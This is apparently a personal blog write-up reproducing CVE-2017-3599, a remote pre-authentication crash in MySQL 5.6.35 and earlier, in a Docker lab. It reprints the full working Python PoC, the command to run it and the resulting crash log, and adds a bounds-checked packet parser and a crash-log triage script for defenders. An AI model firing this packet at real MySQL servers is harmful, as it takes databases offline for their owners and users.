CVE-2017-3599 vulnerability reproduction

First published on my personal site: https://yumlii33.github.io/

References

MySQL < 5.6.35 / < 5.7.17 - Integer Overflow - Multiple dos Exploit

Vulnerability description

Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily “exploitable” vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.

Test environment

  • Docker image: mysql:5.6.35
  • Start the target container: docker run -d -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql:5.6.35

PoC script

# python2.7

'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket 
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)

else:
    HOST = sys.argv[1]

    if len(sys.argv)>2:
        PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
    else:
        PORT = 3306

print "[+] Creating packet..."

'''
3 bytes		Packet length
1 byte  	Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)

packet_auth  = '\xff'			# both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # create outside the try so close() below is always valid
try:
    s.connect((HOST, PORT))
    print "[+] Connected."

except socket.error:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
    s.close()
    print "[+] Exiting."
    exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()
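
The packet layout and the crash conditions in the comments above come down to one missing check: a length prefix of 0xfe announces eight more bytes of auth data, and when fewer than eight bytes follow it the vulnerable server crashes (the backtrace later on this page lands in memchr called from acl_authenticate). The following is an added example, not part of the original post and not the SECFORCE PoC: a bounds-checked Python 3 parser for the same HandshakeResponse41 layout, which rejects a payload whose length prefix outruns the packet instead of reading past it. The capability flag values are the standard MySQL protocol constants; the function names, the MalformedPacket class, the sample builder and the 20-byte scramble are my own and are constructed for the example.

```python
import struct

# Client capability flags from the MySQL wire protocol (standard values).
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000

# Fixed 32-byte part of the login request with the PoC's default values
# ('\x85\xa2\xbf\x01', '\x00\x00\x00\x01', '\x21', then 23 zero bytes).
FIXED_HEADER = struct.pack("<IIB", 0x01bfa285, 0x01000000, 0x21) + b"\x00" * 23


class MalformedPacket(ValueError):
    """Raised when a field would be read past the end of the payload."""


def read_lenenc_int(buf, pos):
    """Read a length-encoded integer at buf[pos]; return (value, next_pos).

    Prefix < 0xfb is the value itself; 0xfc/0xfd/0xfe announce 2/3/8 more
    bytes; 0xff is never a valid prefix. Each branch confirms the announced
    bytes exist before touching them, which is the check that was missing.
    """
    if pos >= len(buf):
        raise MalformedPacket("length prefix missing at offset %d" % pos)
    first = buf[pos]
    if first < 0xfb:
        return first, pos + 1
    width = {0xfc: 2, 0xfd: 3, 0xfe: 8}.get(first)
    if width is None:
        raise MalformedPacket("0xff is not a valid length prefix")
    end = pos + 1 + width
    if end > len(buf):
        raise MalformedPacket("prefix 0x%02x needs %d more bytes, only %d left"
                              % (first, width, len(buf) - pos - 1))
    return int.from_bytes(buf[pos + 1:end], "little"), end


def read_bytes(buf, pos, n):
    """Return exactly n bytes at buf[pos] and the new position, or fail loudly."""
    if pos + n > len(buf):
        raise MalformedPacket("field of %d bytes at offset %d exceeds payload" % (n, pos))
    return buf[pos:pos + n], pos + n


def read_cstring(buf, pos):
    """Read a NUL-terminated string at buf[pos]; return (bytes, pos after NUL)."""
    nul = buf.find(b"\x00", pos)
    if nul < 0:
        raise MalformedPacket("unterminated string at offset %d" % pos)
    return buf[pos:nul], nul + 1


def parse_handshake_response(payload):
    """Parse a HandshakeResponse41 payload (4-byte packet header already removed)."""
    if len(payload) < 32:
        raise MalformedPacket("fixed header needs 32 bytes, got %d" % len(payload))
    caps, max_packet, charset = struct.unpack_from("<IIB", payload, 0)
    if payload[9:32] != b"\x00" * 23:
        raise MalformedPacket("reserved bytes are not all zero")
    user, pos = read_cstring(payload, 32)
    # How the auth data is framed depends on the capability bits the client sent.
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        n, pos = read_lenenc_int(payload, pos)
        auth, pos = read_bytes(payload, pos, n)
    elif caps & CLIENT_SECURE_CONNECTION:
        raw, pos = read_bytes(payload, pos, 1)
        auth, pos = read_bytes(payload, pos, raw[0])
    else:
        auth, pos = read_cstring(payload, pos)
    database = plugin = None
    if caps & CLIENT_CONNECT_WITH_DB:
        database, pos = read_cstring(payload, pos)
    if caps & CLIENT_PLUGIN_AUTH:
        plugin, pos = read_cstring(payload, pos)
    return {"capabilities": caps, "max_packet": max_packet, "charset": charset,
            "user": user, "auth_len": len(auth), "database": database,
            "plugin": plugin, "consumed": pos}


def build_handshake_response(user, auth, plugin=b"mysql_native_password"):
    """Constructed sample: a well-formed payload with the PoC's default capabilities
    (auth must be shorter than 0xfb bytes so a one-byte length prefix is valid)."""
    return FIXED_HEADER + user + b"\x00" + bytes([len(auth)]) + auth + plugin + b"\x00"


def truncated_auth_sample(prefix):
    """Constructed sample with the PoC's shape: user 'test' followed only by a prefix byte."""
    return FIXED_HEADER + b"test\x00" + prefix


def check_payload(payload):
    """Return 'ok' for a parseable payload, otherwise 'malformed: <reason>'."""
    try:
        parse_handshake_response(payload)
        return "ok"
    except MalformedPacket as exc:
        return "malformed: %s" % exc


if __name__ == "__main__":
    good = build_handshake_response(b"test", bytes(range(20)))  # 20-byte scramble, constructed
    print(check_payload(good), parse_handshake_response(good))
    for prefix in (b"\xfe", b"\xff"):
        print(repr(prefix), check_payload(truncated_auth_sample(prefix)))
```

The same discipline applies to every variable-length field in the login request: never advance the read position by a length the peer supplied until that many bytes have been confirmed to exist. A server-side parser written this way returns a protocol error to the client instead of dereferencing memory beyond the packet buffer.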

Running the attack

python poc.py IP 3306

Attack result

The server is denied service; check the database container's log:

root@yml-penetration:~/Workspace/cve-2017-3599# docker logs 100
Initializing database
2023-12-19 12:19:33 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:33 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 36 ...
2023-12-19 12:19:33 36 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:33 36 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:33 36 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:33 36 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:33 36 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:33 36 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:33 36 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:33 36 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:33 36 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:33 36 [Note] InnoDB: The first specified data file ./ibdata1 did not exist: a new database to be created!
2023-12-19 12:19:33 36 [Note] InnoDB: Setting file ./ibdata1 size to 12 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Database physically writes the file full: wait...
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile101 size to 48 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile1 size to 48 MB
2023-12-19 12:19:34 36 [Note] InnoDB: Renaming log file ./ib_logfile101 to ./ib_logfile0
2023-12-19 12:19:34 36 [Warning] InnoDB: New log files created, LSN=45781
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer not found: creating new
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer created
2023-12-19 12:19:34 36 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:34 36 [Warning] InnoDB: Creating foreign key constraint system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Foreign key constraint system tables created
2023-12-19 12:19:34 36 [Note] InnoDB: Creating tablespace and datafile system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Tablespace and datafile system tables created.
2023-12-19 12:19:34 36 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:34 36 [Note] InnoDB: 5.6.35 started; log sequence number 0
2023-12-19 12:19:36 36 [Note] Binlog end
2023-12-19 12:19:36 36 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:36 36 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:38 36 [Note] InnoDB: Shutdown completed; log sequence number 1625977


2023-12-19 12:19:38 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:38 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 59 ...
2023-12-19 12:19:38 59 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:38 59 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:38 59 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:38 59 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:38 59 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:38 59 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:38 59 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:38 59 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:38 59 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:38 59 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:38 59 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:38 59 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:38 59 [Note] InnoDB: 5.6.35 started; log sequence number 1625977
2023-12-19 12:19:38 59 [Note] Binlog end
2023-12-19 12:19:38 59 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:38 59 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:40 59 [Note] InnoDB: Shutdown completed; log sequence number 1625987




PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:

/usr/bin/mysqladmin -u root password 'new-password'
/usr/bin/mysqladmin -u root -h 100bfe039d09 password 'new-password'

Alternatively you can run:

/usr/bin/mysql_secure_installation

which will also give you the option of removing the test
databases and anonymous user created by default.  This is
strongly recommended for production servers.

See the manual for more instructions.

Please report any problems at http://bugs.mysql.com/

The latest information about MySQL is available on the web at

http://www.mysql.com

Support MySQL by buying support/licenses at http://shop.mysql.com

Note: new default config file not created.
Please make sure your config file is current

WARNING: Default config file /etc/mysql/my.cnf exists on the system
This file will be read by default by the MySQL server
If you do not want to use this, either remove it, or use the
--defaults-file argument to mysqld_safe when starting the server

Database initialized
MySQL init process in progress...
2023-12-19 12:19:40 0 [Note] mysqld (mysqld 5.6.35) starting as process 87 ...
2023-12-19 12:19:40 87 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:40 87 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:40 87 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:40 87 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:40 87 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:40 87 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:40 87 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:40 87 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:40 87 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:40 87 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:40 87 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:40 87 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:40 87 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:40 87 [Note] InnoDB: 5.6.35 started; log sequence number 1625987
2023-12-19 12:19:40 87 [Warning] No existing UUID has been found, so we assume that this is the first time that this server has been started. Generating a new UUID: e27a6a12-9e68-11ee-867c-0242ac110002.
2023-12-19 12:19:40 87 [Warning] 'user' entry 'root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'user' entry '@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:40 87 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 0  MySQL Community Server (GPL)
Warning: Unable to load '/usr/share/zoneinfo/iso3166.tab' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/leap-seconds.list' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/zone.tab' as time zone. Skipping it.
2023-12-19 12:19:42 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.

2023-12-19 12:19:42 87 [Note] mysqld: Normal shutdown

2023-12-19 12:19:42 87 [Note] Giving 0 client threads a chance to die gracefully
2023-12-19 12:19:42 87 [Note] Event Scheduler: Purging the queue. 0 events
2023-12-19 12:19:42 87 [Note] Shutting down slave threads
2023-12-19 12:19:42 87 [Note] Forcefully disconnecting 0 remaining clients
2023-12-19 12:19:42 87 [Note] Binlog end
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'partition'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_DATAFILES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESPACES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN_COLS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FIELDS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_COLUMNS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_INDEXES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESTATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_TABLE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_CACHE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_CONFIG'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_BEING_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DEFAULT_STOPWORD'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_METRICS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_POOL_STATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE_LRU'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCK_WAITS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCKS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_TRX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'InnoDB'
2023-12-19 12:19:42 87 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:42 87 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:43 87 [Note] InnoDB: Shutdown completed; log sequence number 1625997
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'BLACKHOLE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'ARCHIVE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'PERFORMANCE_SCHEMA'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MRG_MYISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MyISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'CSV'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MEMORY'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'sha256_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_old_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_native_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'binlog'
2023-12-19 12:19:43 87 [Note] mysqld: Shutdown complete


MySQL init process done. Ready for start up.

2023-12-19 12:19:44 0 [Note] mysqld (mysqld 5.6.35) starting as process 1 ...
2023-12-19 12:19:44 1 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:44 1 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:44 1 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:44 1 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:44 1 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:44 1 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:44 1 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:44 1 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:44 1 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:44 1 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:44 1 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:44 1 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:44 1 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:44 1 [Note] InnoDB: 5.6.35 started; log sequence number 1625997
2023-12-19 12:19:44 1 [Note] Server hostname (bind-address): '*'; port: 3306
2023-12-19 12:19:44 1 [Note] IPv6 is available.
2023-12-19 12:19:44 1 [Note]   - '::' resolves to '::';
2023-12-19 12:19:44 1 [Note] Server socket created on IP: '::'.
2023-12-19 12:19:44 1 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:44 1 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:44 1 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server (GPL)
12:21:29 UTC - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help
diagnose the problem, but since we have already crashed, 
something is definitely wrong and this may fail.

key_buffer_size=8388608
read_buffer_size=131072
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to 
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 68108 K  bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x23d86c0
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 7f3ca45a1e98 thread_stack 0x40000
mysqld(my_print_stacktrace+0x2c)[0x8c3d5c]
mysqld(handle_fatal_signal+0x481)[0x661df1]
/lib/x86_64-linux-gnu/libpthread.so.0(+0xf890)[0x7f3ccee40890]
/lib/x86_64-linux-gnu/libc.so.6(memchr+0x78)[0x7f3ccd885cd8]
mysqld[0x672dc4]
mysqld[0x683e2d]
mysqld[0x68433e]
mysqld[0x6730a9]
mysqld[0x6724df]
mysqld(_Z16acl_authenticateP3THDj+0x1bd)[0x68450d]
mysqld[0x6abe17]
mysqld(_Z16login_connectionP3THD+0x42)[0x6acbe2]
mysqld(_Z22thd_prepare_connectionP3THD+0x19)[0x6ad329]
mysqld(_Z24do_handle_one_connectionP3THD+0x11c)[0x6ad49c]
mysqld(handle_one_connection+0x40)[0x6ad570]
mysqld(pfs_spawn_thread+0x146)[0x8fa106]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x8064)[0x7f3ccee39064]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7f3ccd8e962d]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query (0): Connection ID (thread ID): 1
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.
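
What makes this log useful to a defender is the crash banner and the backtrace: the thread died with signal 11 inside memchr, called from acl_authenticate and login_connection, with connection_count=1, so the fault happened while a single client was still in the login exchange and before any credential was checked. The script below is an added example, not part of the original post: it parses a mysqld crash report of this shape, extracts the counters and frames, takes the first frame below the libpthread signal trampoline as the faulting function (an assumption about how this crash reporter lays out the trace), and flags whether the trace passes through the authentication path. The log excerpt is abridged from the output above and embedded inline; the function and regex names are my own.

```python
import re

# Abridged excerpt of the container log shown above (the page's own output),
# embedded inline so the triage runs offline.
SAMPLE_LOG = """\
2023-12-19 12:19:44 1 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server (GPL)
12:21:29 UTC - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.

key_buffer_size=8388608
read_buffer_size=131072
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1

Thread pointer: 0x23d86c0
stack_bottom = 7f3ca45a1e98 thread_stack 0x40000
mysqld(my_print_stacktrace+0x2c)[0x8c3d5c]
mysqld(handle_fatal_signal+0x481)[0x661df1]
/lib/x86_64-linux-gnu/libpthread.so.0(+0xf890)[0x7f3ccee40890]
/lib/x86_64-linux-gnu/libc.so.6(memchr+0x78)[0x7f3ccd885cd8]
mysqld[0x672dc4]
mysqld(_Z16acl_authenticateP3THDj+0x1bd)[0x68450d]
mysqld(_Z16login_connectionP3THD+0x42)[0x6acbe2]
mysqld(_Z22thd_prepare_connectionP3THD+0x19)[0x6ad329]
mysqld(_Z24do_handle_one_connectionP3THD+0x11c)[0x6ad49c]
mysqld(handle_one_connection+0x40)[0x6ad570]
mysqld(pfs_spawn_thread+0x146)[0x8fa106]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x8064)[0x7f3ccee39064]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7f3ccd8e962d]

Trying to get some variables.
Query (0): Connection ID (thread ID): 1
Status: NOT_KILLED
"""

CRASH_RE = re.compile(r"^(\d\d:\d\d:\d\d) UTC - mysqld got signal (\d+)")
COUNTER_RE = re.compile(r"^([a-z_]+)=(\d+)$")
# module(symbol+0xoff)[0xaddr], module(+0xoff)[0xaddr] or module[0xaddr]
FRAME_RE = re.compile(r"^(?P<module>[^\s(\[]+)(?:\((?P<symbol>[^+)]*)(?:\+0x[0-9a-f]+)?\))?\[0x(?P<addr>[0-9a-f]+)\]$")
# Mangled C++ names still contain the plain identifier, so substring matching is enough.
AUTH_PATH = ("acl_authenticate", "login_connection")


def triage_crash_log(text):
    """Summarise a mysqld crash report: signal, counters, frames, fault site, auth path."""
    report = {"crashed": False, "time": None, "signal": None, "counters": {},
              "frames": [], "fault_symbol": None, "in_auth_path": False}
    in_trace = False
    for raw in text.splitlines():
        line = raw.strip()
        m = CRASH_RE.match(line)
        if m:
            report["crashed"] = True
            report["time"], report["signal"] = m.group(1), int(m.group(2))
            continue
        if not report["crashed"]:
            continue                      # only lines after the banner belong to the report
        m = COUNTER_RE.match(line)
        if m:
            report["counters"][m.group(1)] = int(m.group(2))
            continue
        if line.startswith("stack_bottom"):
            in_trace = True
            continue
        if in_trace:
            if not line:                  # a blank line closes the backtrace
                in_trace = False
                continue
            m = FRAME_RE.match(line)
            if m:
                report["frames"].append({"module": m.group("module"),
                                         "symbol": m.group("symbol") or None,
                                         "addr": m.group("addr")})
    frames = report["frames"]
    # Frames above the libpthread signal trampoline are the crash reporter itself;
    # the first frame below it is where the fault was raised (assumption, see lead-in).
    for i, frame in enumerate(frames):
        if "libpthread" in frame["module"] and i + 1 < len(frames):
            nxt = frames[i + 1]
            report["fault_symbol"] = nxt["symbol"] or nxt["module"]
            break
    report["in_auth_path"] = any(
        f["symbol"] and any(name in f["symbol"] for name in AUTH_PATH) for f in frames)
    return report


if __name__ == "__main__":
    r = triage_crash_log(SAMPLE_LOG)
    print("signal %s at %s, fault in %s, auth path: %s, connections: %s"
          % (r["signal"], r["time"], r["fault_symbol"], r["in_auth_path"],
             r["counters"].get("connection_count")))
```

Feed it the output of docker logs for the container to get the same summary. On the detection side, a "mysqld got signal" line, or a container that restarts shortly after a single connection is accepted, is the signal worth alerting on; the fix is to run a release newer than the ones the advisory above lists as affected.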